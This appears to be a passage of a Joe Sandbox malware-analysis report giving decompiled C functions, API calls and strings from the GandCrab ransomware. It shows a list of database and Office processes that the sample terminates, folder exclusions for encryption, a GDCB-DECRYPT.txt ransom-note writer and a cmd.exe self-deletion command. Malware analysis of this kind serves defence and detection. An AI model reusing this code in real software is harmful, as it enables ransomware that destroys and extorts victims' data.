							if( *_t21() == 0 || E0FBC8090(_t46, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t21() == 0 || E0FBC8090(_t46, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t21() == 0 || E0FBC8090(_t46, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L16;
									}
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
						} else {
							goto L16;
						}
					}
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6653
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC66F2
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC670C
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6726
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6740
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6760
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6775

Strings

\Program Files\, xrefs: 0FBC666F
\ProgramData\, xrefs: 0FBC6659
\Tor Browser\, xrefs: 0FBC6683
:\Windows\, xrefs: 0FBC66D3
Ransomware, xrefs: 0FBC6697
\Local Settings\, xrefs: 0FBC66BF
\All Users\, xrefs: 0FBC66AB

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
API String ID: 1363212851-2358141795
Opcode ID: 1c81fec78ecc2277b9952246f563022f8762c501c7aee4cd462bb580b97599d9
Instruction ID: d7a0d6c398f62085b3285aa264dcf1ebf0d3e6fb61d3115576314694433b4892
Opcode Fuzzy Hash: 1c81fec78ecc2277b9952246f563022f8762c501c7aee4cd462bb580b97599d9
Instruction Fuzzy Hash: D8312D2134071123F96021773E65F2B668BCBD1E51F5144DEAF15DE2C3EE9AD8024AE9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC5060 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0FBC5060() {
				WCHAR* _v8;
				intOrPtr _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v60;
				short _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xfbd04c0]");
				_v24 =  &_v80;
				asm("movdqu [ebp-0x4c], xmm0");
				_v20 =  &_v60;
				asm("movdqa xmm0, [0xfbd04d0]");
				_v64 = 0x6e;
				asm("movdqu [ebp-0x38], xmm0");
				_v44 = 0;
				_v40 = 0x646e6167;
				_v36 = 0x62617263;
				_v32 = 0x7469622e;
				_v28 = 0;
				_v16 =  &_v40;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0FBC4E90(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,77296980,00000000,00000000), ref: 0FBC50C6
Sleep.KERNEL32(000003E8), ref: 0FBC5103
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FBC5111
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FBC5121
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FBC513D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC514E
wsprintfW.USER32 ref: 0FBC5166
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC5177

Strings

.bit, xrefs: 0FBC50B8
gand, xrefs: 0FBC50AA
crab, xrefs: 0FBC50B1
n, xrefs: 0FBC509B
fabian wosar <3, xrefs: 0FBC5137

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$crab$fabian wosar <3$gand$n
API String ID: 2709691373-4182624408
Opcode ID: 72652b53b2996df2613be322f1fb3ce0905ae6a678b7f426b36688c18a6363a9
Instruction ID: ae293a2a152ec464ad72bd2468a2f1191b9afd2da71f737a5715e6998e9f3bc1
Opcode Fuzzy Hash: 72652b53b2996df2613be322f1fb3ce0905ae6a678b7f426b36688c18a6363a9
Instruction Fuzzy Hash: 9931D471E00309ABDB108FAAAC99BEFBBB8EB48715F100199F655B7281D6741A018FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7140 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBC7140(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

APIs

lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7192
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC719D
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71B3
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71BE
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71D4
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71DF
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71F5
lstrlenW.KERNEL32(0FBC4966,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7200
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7216
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7221
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7237
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7242
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7261
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC726C
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7288
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7296

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: c0321e2815f34648a6c0bb65bc254bd90ace8e502634ac4fda62af27c8ef77cb
Instruction ID: dcc2b4d1339ea8e8f2895594ec1a2ddff0306602c99b7df4b17ce356b3a3ad48
Opcode Fuzzy Hash: c0321e2815f34648a6c0bb65bc254bd90ace8e502634ac4fda62af27c8ef77cb
Instruction Fuzzy Hash: 30414E32100616EFC7115FA9FD9C786B7A6FF08366B090578E40283661D734A475DFC4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC46F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0FBC46F0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				int _t51;
				int _t52;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t70 = CreateToolhelp32Snapshot(2, 0);
				_v172 = _t70;
				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70);
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000);
				}
				return CloseHandle(_t72);
			}

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0FBC4862
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0FBC487C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FBC4895
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FBC48B5
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FBC48C5
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FBC48D4
CloseHandle.KERNEL32(00000000), ref: 0FBC48E1
Process32NextW.KERNEL32(?,00000000), ref: 0FBC48FA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC4913
CloseHandle.KERNEL32(?), ref: 0FBC491A

Strings

i)w, xrefs: 0FBC48B5

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: i)w
API String ID: 3586910739-1280834553
Opcode ID: 26e84defbfca5bf213ec689cf3ef5b5ecd3dfb4281698308e26cca04f201ac54
Instruction ID: f2a6f44afe90fd939071052b7475a56d14e02975904185e4cfaa34c634640535
Opcode Fuzzy Hash: 26e84defbfca5bf213ec689cf3ef5b5ecd3dfb4281698308e26cca04f201ac54
Instruction Fuzzy Hash: E0516DB6104380DFD7208F16B85876BBBEAFB86718F5049DCE5985B252C7708909CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC53A0 Relevance: 18.1, APIs: 12, Instructions: 92
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC53A0(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,772D81D0,00000000,?,?,?,?,0FBC55B2), ref: 0FBC53B9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0FBC55B2), ref: 0FBC53CC
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0FBC55B2), ref: 0FBC53E5
CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0FBC55B2), ref: 0FBC5404
MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0FBC55B2), ref: 0FBC541A
lstrlenW.KERNEL32(?,?,?,?,?,0FBC55B2), ref: 0FBC542E
lstrlenA.KERNEL32(0000004E,?,?,?,?,0FBC55B2), ref: 0FBC543A
lstrlenA.KERNEL32(0000004E,?,?,?,?,0FBC55B2), ref: 0FBC5459
UnmapViewOfFile.KERNEL32(?,?,?,?,?,0FBC55B2), ref: 0FBC546B
CloseHandle.KERNEL32(?,?,?,?,?,0FBC55B2), ref: 0FBC547A
CloseHandle.KERNEL32(00000000,?,?,?,?,0FBC55B2), ref: 0FBC5481
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0FBC55B2), ref: 0FBC548F

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
String ID:
API String ID: 869890170-0
Opcode ID: b35a98a84c646ad0f0e9210e6d47d112f6a3258dca9412bb2b634cc4396dd860
Instruction ID: 69541e6c4ecbddbdfa74e05b8714b08604339168c68f28e49f43697fc666e501
Opcode Fuzzy Hash: b35a98a84c646ad0f0e9210e6d47d112f6a3258dca9412bb2b634cc4396dd860
Instruction Fuzzy Hash: 1C318170640319BBE7205BA59C5AF9B7B6CEB0AB12F144194F741BB1C1C6B8A5128FE8

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC6BE0(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xfbd2a64; // 0x1f2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xfbd2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0fbc6bfb
0x0fbc6c03
0x0fbc6c25
0x0fbc6c2a
0x0fbc6c3e
0x0fbc6c45
0x0fbc6c5e
0x0fbc6c5e
0x0fbc6c65
0x0fbc6c6b
0x0fbc6c2c
0x0fbc6c39
0x0fbc6c39
0x0fbc6c78
0x0fbc6c86

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FBC6CC2,00000000,?,?), ref: 0FBC6BF5
wsprintfW.USER32 ref: 0FBC6C03
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FBC6C1F
GetLastError.KERNEL32(?,?), ref: 0FBC6C2C
lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0FBC6C4E
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0FBC6C5E
CloseHandle.KERNEL32(00000000,?,?), ref: 0FBC6C65
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBC6C78

Strings

%s\GDCB-DECRYPT.txt, xrefs: 0FBC6BFD

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\GDCB-DECRYPT.txt
API String ID: 2985722263-4054134092
Opcode ID: d5bbbb2d1cc34c0eacbe9c7032e5c49b87d81c1d8d2ae1ee3cb1a4e1782c922c
Instruction ID: 0c4e4fffe07202efd82e9e9f75c6daa51f6cf4019098034842d248a142945f70
Opcode Fuzzy Hash: d5bbbb2d1cc34c0eacbe9c7032e5c49b87d81c1d8d2ae1ee3cb1a4e1782c922c
Instruction Fuzzy Hash: 130192713403047BE3201766AD9AF6B3B6DDB4AF67F100194FB05A61C1D6A869228EE9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC5190 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC5190() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0fbc51b6
0x0fbc51ba
0x0fbc51be
0x0fbc51c8
0x0fbc51d0
0x0fbc51d9
0x0fbc51f3
0x0fbc51f3
0x0fbc51d0
0x0fbc51fb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FBC5392,00000000), ref: 0FBC51A6
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBC51B8
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0FBC51C8
wsprintfW.USER32 ref: 0FBC51D9
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FBC51F3
ExitProcess.KERNEL32 ref: 0FBC51FB

Strings

open, xrefs: 0FBC51EC
/c timeout -c 5 & del "%s" /f /q, xrefs: 0FBC51D3
cmd.exe, xrefs: 0FBC51E7

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 9de87f3fb0751eff1f74e8e8ddb7b1f393d011f1db69193973e745094e70ee1e
Instruction ID: 433f79e27c897fc97c2bfc938c8bc12f169277bc67fde88279e0c371dc6a4a3e
Opcode Fuzzy Hash: 9de87f3fb0751eff1f74e8e8ddb7b1f393d011f1db69193973e745094e70ee1e
Instruction Fuzzy Hash: 5DF01C717C131477F23116662C2FF172D2C9B4AF26F290188B704BF1C289E464118EE9

Uniqueness

Uniqueness Score: -1.00%

